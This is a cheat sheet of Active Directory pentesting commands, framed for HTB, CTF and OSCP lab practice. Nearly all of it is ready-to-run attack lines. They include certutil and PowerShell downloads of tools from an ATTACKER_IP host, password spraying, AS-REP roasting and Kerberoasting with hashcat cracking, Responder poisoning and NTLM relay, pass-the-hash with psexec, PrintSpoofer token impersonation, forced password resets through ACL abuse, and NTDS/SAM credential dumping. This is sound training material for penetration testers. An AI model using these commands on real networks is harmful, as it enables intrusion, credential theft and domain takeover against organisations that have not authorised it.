A practical cheat sheet for fast Active Directory enumeration and exploitation during HTB, CTFs and offensive security labs.

0. ESSENTIAL AD PENTESTING RESOURCES & TOOLS

Before deep manual enumeration, these core tools give fast, high-value visibility into AD attack paths.

Core Tools & Frameworks

Impacket
BloodHound
SharpHound (BloodHound ingestor)
CrackMapExec (CME)
rpcclient / smbclient (Linux built-ins)
Kerbrute (User Brute-Forcing)
PowerView (PowerShell AD enumeration)
Certify / ForgeCert (AD CS attacks)
Responder (LLMNR/NBNS poisoning)

0.1 QUICK FILE TRANSFER COMMANDS (upload tools to target)

Attacker: Host files


python3 -m http.server 8000

Victim: Download tools


certutil -urlcache -f http://ATTACKER_IP:8000/SharpHound.exe SharpHound.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/PowerView.ps1','PowerView.ps1')"

certutil -urlcache -f http://ATTACKER_IP:8000/Certify.exe Certify.exe

1. BASIC ENUMERATION

Identify Domain Information


nltest /dsgetdc:<domain>
whoami /groups
systeminfo | findstr /i "domain"

Network Shares


net view \<DC>
net share
smbclient -L //<DC> -U '<user>'

Domain Users


net user /domain

Domain Groups


net group /domain

Domain Controllers


nltest /dclist:<domain>

2. ENUMERATION USING IMPACKET

Get users via LDAP


ldapsearch -H ldap://<DC> -x -b "dc=corp,dc=local"

impacket-GetADUsers


GetADUsers.py corp.local/user:password -all

List SMB shares


smbclient -L //<DC> -U 'corp.local/user%password'

Dump user info


rpcclient -U "" <DC> -c "enumdomusers"

3. PASSWORD SPRAYING

CME spraying


crackmapexec smb <CIDR> -u users.txt -p Password123!

Kerbrute user enumeration


kerbrute userenum -d corp.local users.txt --dc <DC_IP>

4. KERBEROS-BASED ATTACKS

4.1 AS-REP Roasting (No Pre-auth Required)

Find vulnerable accounts:


GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip <DC_IP>

Hash format: $krb5asrep$...

Crack:


hashcat -m 18200 hash.txt wordlist

4.2 Kerberoasting (Service Tickets)

Request service tickets using Impacket:


GetUserSPNs.py corp.local/user:password -request

Crack:


hashcat -m 13100 kerberoast.txt wordlist

4.3 Pass-the-Ticket

List tickets:


klist

Use ticket:


export KRB5CCNAME=/tmp/krb.ccache
psexec.py corp.local/[email protected]

5. NTLM RELAY & LLMNR/NetBIOS POISONING

Start Responder


responder -I eth0

Useful in flat networks where LLMNR/NBNS is enabled.

NTLM Relay (to LDAP)


ntlmrelayx.py -t ldap://<DC_IP> --dump

Relay to SMB (add user)


ntlmrelayx.py -t smb://<TARGET> --add-computer

6. SMB & RPC ATTACKS

Null sessions


rpcclient -U "" -N <DC_IP>

Enumerate groups


rpcclient <DC_IP> -U "" -c "enumdomgroups"

SMB exec


psexec.py corp.local/user:password@<host>

7. ABUSING ACTIVE DIRECTORY PERMISSIONS

Check ACLs with PowerView


Import-Module .\PowerView.ps1
Get-ObjectACL -Identity <user/group>

Find:

GenericAll
GenericWrite
WriteOwner
WriteDacl
ForceChangePassword
AddMembers permissions

Reset password via ForceChangePassword


Set-DomainUserPassword -Identity victimuser -AccountPassword (ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force)

8. BLOODHOUND QUICK USAGE

Collect Data


SharpHound.exe -c All

Upload to BloodHound GUI

Analyse typical attack paths:

User → Group → Admin → Domain Admin
WriteDacl / GenericAll on objects
Sessions on servers
Kerberoastable accounts
AS-REP roastable accounts

9. AD CS (CERTIFICATE SERVICES) ATTACKS

Enumerate AD CS


Certify.exe find

Request certificate for authentication


Certify.exe request /ca:<CA_NAME> /template:<TEMPLATE>

Forge certificate (ESC4 / ESC8)


ForgeCert.exe --template <template> --subject "CN=Administrator" ...

Authenticate with certificate


Rubeus.exe asktgt /user:Administrator /certificate:<cert.pfx>

10. PASS-THE-HASH (PTH)

Using CME


crackmapexec smb <TARGET> -u admin -H <NTLM>

Using Impacket


psexec.py corp.local/Administrator@<HOST> -hashes <LMHASH>:<NTHASH>

11. TOKEN IMPERSONATION (WINDOWS)

List tokens


whoami /priv

Look for:

SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege

Exploit:


PrintSpoofer.exe -i -c cmd

12. DUMPING CREDENTIALS (NTDS, SAM, LSA)

NTDS Dump via SecretsDump


secretsdump.py corp.local/Administrator@<DC_IP>

Extract SAM & SYSTEM


reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
secretsdump.py -sam SAM -system SYSTEM LOCAL

Final Notes

This cheat sheet centralizes the core Active Directory pentesting techniques:

Kerberos attacks (AS-REP, Kerberoasting, PTT, PTH)
LLMNR/NBNS poisoning & NTLM relay
SMB/RPC enumeration
ACL abuses & BloodHound attack pathing
AD CS certificate attacks
Token impersonation
Credential dumping
Automated enumeration tools

Suitable for HTB, CTFs, OSCP prep and controlled AD pentest labs.

Active Directory Pentesting Cheatsheet